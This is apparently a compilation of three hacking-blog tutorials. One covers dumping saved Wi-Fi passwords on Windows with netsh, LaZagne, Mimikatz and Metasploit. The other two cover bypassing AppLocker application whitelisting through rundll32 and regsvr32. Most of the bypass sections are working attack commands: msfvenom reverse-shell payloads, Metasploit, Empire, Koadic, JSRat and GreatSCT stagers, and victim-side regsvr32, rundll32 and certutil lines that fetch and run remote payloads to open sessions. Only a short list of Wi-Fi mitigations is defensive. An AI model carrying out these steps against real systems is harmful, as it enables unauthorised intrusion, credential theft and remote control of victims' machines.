Credential Dumping: Wireless

Today we will be taking a look at how we can dump Wireless Credentials. We will cover Credential Dumping, Red Teaming, Different ways we can get those pesky wireless credentials.

Table of Content

·         What is Credential Dumping?

·         Credential Dumping in Real Life

·         Credential Dumping and Red Teaming

·         Credential Dumping Methods

o   netsh

o   WirelessKeyView

o   Wifi Network Properties

o   LaZagne

o   Mimikatz

o   Metasploit Framework

·         Mitigation

What is Credential Dumping?

When the term password cracking is used in the cyber world, it is being used as a broad concept as it shelters all the methods related to attacking/dumping/retrieving passwords of the victim/target. But today, in this article we will solely focus on a technique called Credential Dumping.

Credential dumping is said to be a technique through which username and passwords are extracted of any login account from the target system. It is this technique that allows an attacker to get credentials of multiple accounts from one person. And these credentials can be of anything such as a bank, email account, social media account, wireless networks.

Credential Dumping in Real Life

When an attacker has access to the target system and through that access, they successfully retrieve the whole bunch of their credentials. Once you are inside the target’s system, there are multiple methods to retrieve the credentials of a particular thing. For instance, to redeem all the names and passwords of the wireless networks to which the operating system has connected, there are various methods that an attacker can use and we will try and cover all of those methods here in our article. Now another thing to focus on is that this dumping of credentials can be done both in internal penetration testing and external penetration testing, it depends on the methodology, perspective or subjectivity of the attack on the bases of which the best suitable method can be decided.

Credential Dumping Methods

Just like the instance presented above, we will portray various methods to dump wireless credentials from a system in this article. So, let’s get started, shall we?

Manual Credential Dumping

All the Wi-Fi password with their respective SSID are stored in an XML file. The location of these files is C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***. Here, you will find that SSID of wifi is saved in clear text whereas passwords are stored as keys.

Credential Dumping using netsh

Netsh is a scripting utility provided by Microsoft itself. It can be used both in command prompt or Windows PowerShell. Netsh is short for network shell. When executed, it provides detailed information about the configuration of the network that the system ever had; including revealing the credentials of wireless networks that it has ever been connected to. This utility comes with various parameters that can be used to get various information as per the requirement. This method can be used both in internal and external penetration testing as netsh commands can be executed both locally and remotely.

To get the list of the SSIDs that the device has been connected to use the following command:

netsh wlan show profiles

And as a result of the above command, you can see the names of the Wi-Fi networks that the system was connected to in the past or present such as Meterpreter, Linuxlab, etc. The same has been demonstrated in the image above.

Further, to know the passwords of any one of the mentioned SSIDs use the following command :

netsh wlan show profile name= key=clear

And just like it is shown in the image above, the result of the above command will give you the password.

Credential Dumping using WirelessKeyView

A wireless key view is a simple software accesses the XML files where wireless passwords are stored and reveals them in cleartext. This tool was developed to recover lost and forgotten password of a wireless network. This is the perfect method for credential dumping in internal network penetration testing. To utilize this method simply download the tool from here and run it, you will get all the Wi-Fi names and its password as shown in the image below:

Credential Dumping using Wifi Network Properties

Our next method is manual, it is good when you are introduced to the network to work but for some reason, the password of the network isn’t revealed to you. Then you can use this method, as it falls under the category of internal penetration testing methodology. To reveal the password of a wireless network manually, go to Control Panel > Network and Internet > Network and Sharing Center and then click on Wi-Fi (*SSID*). A dialogue box will open, in that box click Wireless Properties button in the upper pane. Next, go to Security tab and you can see the password there just as it is shown in the image below:

Credential Dumping using LaZagne

LaZagne is an open-source tool that was developed to retrieve all the passwords stored in your machine. We have covered LaZagne in our other article, which you can read from here. In our experience, LaZagne is an amazing tool for credential dumping and its the best tool to be used for external penetration testing. To extract Wi-Fi password with LaZagne, simply download the tool from here and run it remotely using it following command :

lazagne.exe Wi-Fi

After running the above command, all the Wi-Fi-related passwords with their respective SSID will be extracted.

Credential Dumping using Mimikatz

Another method that can be very useful in external penetration testing is using Mimikatz. We have covered various features of Mimikatz in our other article, which you can find here. Once you have the victim’s session use the following commands to get the passwords:

getsystem

load kiwi

Wi-Fi_list_shared

And very easily you will have all the passwords at your service as shown in the image above.

Credential Dumping using Metasploit Framework

Then our next method is to use Metasploit to retrieving desired passwords. As all of us know that Metasploit is a framework that provides us with already constructed exploits to make pentesting convenient. And is an amazing platform for a beginner and expert in hacking pentesting world.

Now, to dump credentials there comes an in-built post exploit in the Metasploit and to run the said exploit; go to the terminal of Metasploit by typing msfconsole and get the session of you to the target system using any exploit you prefer. And then background the session use the post-exploit for extracting desired Wi-Fi credentials by using the following commands:

use post.windows.wlan/wlan_profile

set session 1

exploit

And just as it is shown in the image above, you will have your credentials.

Mitigation

There are various measures that you can follow in order to protect yourself from credential dumping attacks. These measures are given below:

·         Keep you employees/employers aware

·         DO NOT use default SSID of a wireless network

·         Do not save the passwords on the system

·         Always reconnect to a Wi-Fi manually.

·         Have a different network for guests

·         Use VPN

·         Change your Wi-Fi password regularly

·         Use a different IP address instead of the default one

·         Make sure your modems don’t have reset button as most of the modems come with the reset button. When the said button is pressed, it brings back the default settings which doesn't have any security layer and allows anyone to connect.

So, these were the methods to dump wireless credentials. Apply the suggested mitigation to your systems or networks in order to keep yourself safe from attackers. I hope these were useful and keep tuning in for various hacking techniques!

We are well aware these are tough times for everyone and, we, here at hacking articles hope and pray that everyone is safe and following the measure of self-quarantine. And for all the hacking/pen-testing enthusiasts we are working hard to bring more and more new content so that you can learn new things and use this self-isolation to its best. Stay Safe and take care! Happy Hacking!

Bypass Application Whitelisting using rundll32.exe (Multiple Methods)

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with RunDLL files.

Tables of Content

·         Introduction

·         Working of DLL files

·         Advantages

·         Disadvantages

·         Different methods for AppLocker Bypass using DLL files

·         Conclusion

Introduction

DLL files and their Importance for window’s OS to work and it also determines the working of other programs that customises your windows. Dynamic Link Library (DLL) files are the type of file which provides instructions to other programs on how to call upon certain things. Therefore, multiple software’s can share such DLL files, even simultaneously. In spite of being in the same format as .exe file, DLL files are not directly executable like .exe files. DLL file extensions can be : .dll(Dynamic Link Library), .OCX(ActiveX Controls), .CPL(Control Panel), .DRV(Device Drivers).

Working

When in use, DLL files are divided into sections. This makes working of DLL files easy and faster. Each section is installed in main program at run time. As each section is different and independent; load time is faster and is only done when the functionality of the said file is required. This ability also makes upgrades easier to apply without affecting other sections. For example: you have a dictionary program and new words are added every month, so for this all you have to do is update it; without requiring to install a whole another program for it.

Advantages

·         Uses fewer resources

·         Promotes modular architecture

·         Eases deployment and installation

Disadvantages

·         A dependent DLL is upgraded to a new version.

·         A dependent DLL is fixed.

·         A dependent DLL is overwritten with an earlier version.

·         A dependent DLL is removed from the computer.

Methods

·         Smb_Delivery

·         MSFVenom

·         Koadic

·         JSRat

So, our method is using smb_delivery. To use this method, open the terminal in kali and type the following commands ;

msfconsole

use exploit/windows/smb/smb_delivery

msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107

msf exploit(windows/smb/smb_delivery) > exploit

Now run the malicious code through rundll32.exe in the windows machine to obtain meterpreter sessions.

As the above code will run, it will provide you with a command that is to be executed on the victim’s PC; in order to get a session. So copy and paste the said command in the run window of the victim’s PC as shown in the image below:

rundll3.exe \\192.168.1.107\ZtmW\test.dll,0

As soon as the command is executed, you will have your meterpreter session. To access the session type :

sessions 1

sysinfo

MSFVenom

Our second method is via MSFVenom. For the utilisation of this method, type the following command in the terminal of kali :

msfvenom -p windows/meterpreter.reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll

Once the payload is created, run the following command in the run window of victim’s PC:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

Simultaneously, start the multi/handler to get a session by typing :

msfconsole

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.107

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

Koadic

Our next method is using Koadic framework. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once the koadic is up and running, type:

use stager/js/rundll32_js

set SRVHOST 192.168.1.107

run

Running the exploit will give you a command. Copy that command from rundll32.exe to 6.0”) and paste it in the command prompt of the victims’ PC.

Once you run the command in the cmd, you will have your session. As shown in the following imgae.

To access the session type :

zombies 0

Now the dilemma is, what to do if command prompt is blocked in victim’s PC.

If the command line is blocked, there is script developed by Didier Stevens. You can find them in the following link :

http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip

By executing the above URL, you will download a zip file. Extract that zip file and use the following command to run the said file in run windows:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

As soon as you run the command, you will have unblocked the cmd. As shown below:

JSRat

Our next method of attacking regsvr32 is by using JSRat and you can download it from github. This is another very small command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a webserver and on that webserver we will find our .sct file. To use this method type:

./JSRat.py -I 192.168.1.107 -p 4444

Once JSRat starts working, it will give you a link to open in browser. That webpage will have a code which is to be executed on the victim’s pc.

Therefore, open the http://192.168.1.107/wtf link in your browser. There you will find the said code as shown in the image below:

Run that code in the command prompt of the victims’ PC as shown:

And voila, you will have a session as the image below:

Conclusion

DLL files are collection of various codes and procedure held together. These files helps windows programs to execute accurately. These files were created for multiple programs to use them simultaneously. This technique helps in memory conservation. Therefore these files are important and required by windows to run properly without giving users any kind of problems. Hence, exploitation through such files is very efficient and lethal. And above presented methods are the different ways to do it.

Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with regsvr32.exe.

Tables of content

·         Introduction to regsvr

·         Working of regsvr

·         Multiple  methods to attack regsvr

Introduction

Regsvr32 stands for Microsoft Register Server. It is a windows command-line utility tool. While regsvr32 causes problems sometimes; it’s an important file as its windows system file. The file is found in the subfolder of C:\Windows. This file is able to observe, track and influence other programs. It’s mainly used to register and unregister programs in windows. File extension for this is .exe and its process widely assists OLE (Object Linking and embedding), DLL (Data Link Libraries) and OCX (ActiveX control modules). The said process works in the background and can be seen via task manager. Its Microsoft's one of the trusted files.

Working

Information about programs associated with regsvr32 is added to windows, when you register a DLL file in regsvr32. These defences are then accessed to understand where the program data is and how to interact with it. As while registering a DLL file, information is added to central to directory so that it can be used by the windows. The whole path of these files literally has the executable code and due to this windows can call upon specific functions and use them to call executable code. These files are very convenient as when a software is updated, these file automatically call upon the updated version; in short it helps avoid the version problems of a software. Usually this file is not commonly used except for registering and unregistering DLL files.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] 

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

Multiple Methods

·         Web delivery

·         Empire

·         Manual

·         MSFVenom

·         Koadic

·         JSRat

·         GreatSCT

Web Delivery

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection.

Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request a .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 3

msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.1.109

msf exploit (web_delivery)>set srvhost 192.168.1.109

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below:

Once the exploit is running; you will have a URL made for you. Run that URL in the command prompt of the Victim’s PC as shown below:

regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

Once you hit enter after the command, you will have your session. Type ‘sysinfo’ for the information of the PC as shown in the image below:

PowerShell Empire

For our next method of regsvr Attack we will use empire. Empire is a post-exploitation framework. Till now we have pairing our .sct tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire à https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empire framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener, type :

uselistner http

set Host http://192.168.1.109

execute

With the above commands, you will have an active listener. Type back to go out of listener so you can initiate your powershell.

Once you are out the listener, you need to use an exploit to create your malicious file. A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. Which means to create an exploit, we will have to use stager. Therefore, type :

usestager windows/launcher_sct

set listener http

execute

After the execution of execute command, usestager will create a launcher.sct in /tmp. Now to get session start the python server by typing:

python -m SimpleHTTPServer 8080

As the server is on, the only step left is to execute our malware in the victim’s PC. For this, type the following command in the command prompt :

regsvr /s /n /u /i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll

In the above command we have used port 8080 because our server of python is activated on the same port.

Once the above is executed as told, you will receive a session. To access the session type :

interact 9ATUX4M7

here,

9ATUX4M7 : is a agent/session name. this will vary from session to session.

Inject PowerShell code in sct File (Manual Method)

Our next method manual with a help of an exploit. The exploit we will use will help us to create a powershell code. So let’s first create our powershell and for this go to the terminal of kali and type :

After running this exploit, it will show you the powershell code on the terminal screen as shown in following image :

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.1.109

msf exploit (web_delivery)>set srvhost 192.168.1.109

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below:

Now we need to create .sct file in order for our attack to run. We found a script online to create a .sct file. You can access the link for the script by clicking  here. The script is shown in image below :

Copy the powershell code which was created by web_delivery and paste it in the above script where it says “calc.exe” as shown in the image below and then finally save it with .sct extension.

Then repeat above step to run .sct file with regsvr32.exe in the victim’s PC:

regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll

As soon as the above command is executed, you will have your session through web_delivery. To access the sessioni type ‘sessions 1’ and ‘info’ to have basic information of the system.

MsfVenom

Our next method is to use msfvenom. Through this method we will create a two .sct, one to download our malware and another to execute it.  But first let’s get going with msfvenom and for that type :

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

Start up the python server using following command:

python -m SimpleHTTPServer 80

And simultaneously, in the same script, used in the previous method inject certutil.exe command to call the shell.exe file from remote server. Therefore, instead of “calc .exe” write the following and save file again with .sct extension:

“certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe”

We have used curtutil here as it allows to download a file in windows and also saved file as 3.sct.

Now, run the above script using following command:

regsvr32 /u /n /s /i:http;//192.168.1.109/3.sct scrobj.dll

We will create another file to execute our previous file “shell.exe”. For that again take the same script and where its written “calc.exe”; therefore write :

“cd /k cd c:\Users\raj & shell.exe”

This we have saved script as 4.sct and again run this script using the following command :

regsvr32 /u /n /s /i:http;//192.168.1.109/4.sct scrobj.dll

Side by side start up the multi handler too, to get a session. Hence, type :

use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.109

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

After running the command in victim’s PC, u will have meterpreter session.

Koadic

Our next method is using Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once the koadic is up and running, type:

use stager/js/regsvr

set srvhost 192.168.1.107

run

After this, type the following in the command prompt of the victim’s:

regsvr32 /u /n /s /i:http;//192.168.1.107:9998/uWBjv scrobj.dll

Once you run the above command, you will have a session. To access the session type :

zombie 0

JSRat

Our next method of attacking regsvr32 is by using JSRat and you can download it from github. This is another very small command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a webserver and on that webserver we will find our .sct file. To use this method type:

./JSRat.py -I 192.168.1.107 -p 4444

Running the above command will start webserver.

Open this in your browser as shown below. Here, you will find the .sct file that you need to run on your victim’s PC.

As we have got the command, run the command in the run window as shown in the image below:

After executing the command in the run window you will have a session as shown:

GreatSCT

GreatSCT is tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from https://github.com/GreatSCT/GreatSCT

Once its downloaded and running, type the following command to access the modules :

use Bypass

Then type ‘list’  to get the list of modules.

List of modules will appear as shown in image below :

From the list of modules choose the following :

use regsvr/shellcode_iject/base64_migrate.py

generate

After the above commands, type 1 to choose MSFVenom

Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the give port (any) as here you can see in the image below that we have given lport as 2345

After giving the details, it will ask you a name for your malware. By defualt it will set name ‘payload’ so either your can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of then will a resource file ad other will be .sct file.

Now, firstly, start the python’s server in /usr/share/greatsct-output by typing :

python -m SimpleHTTPServer 80

Now execute the .sct file in the run window of the victim’s PC as shown below.

Simultaneously, start the multi/handler using recourse file. For this, type :

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And you have meterpreter session.

Conclusion

Using regsvr32 to gain a session is write unusual way but it’s very important. And so above mentioned methods uses different tools and software to allow us to perform this attack.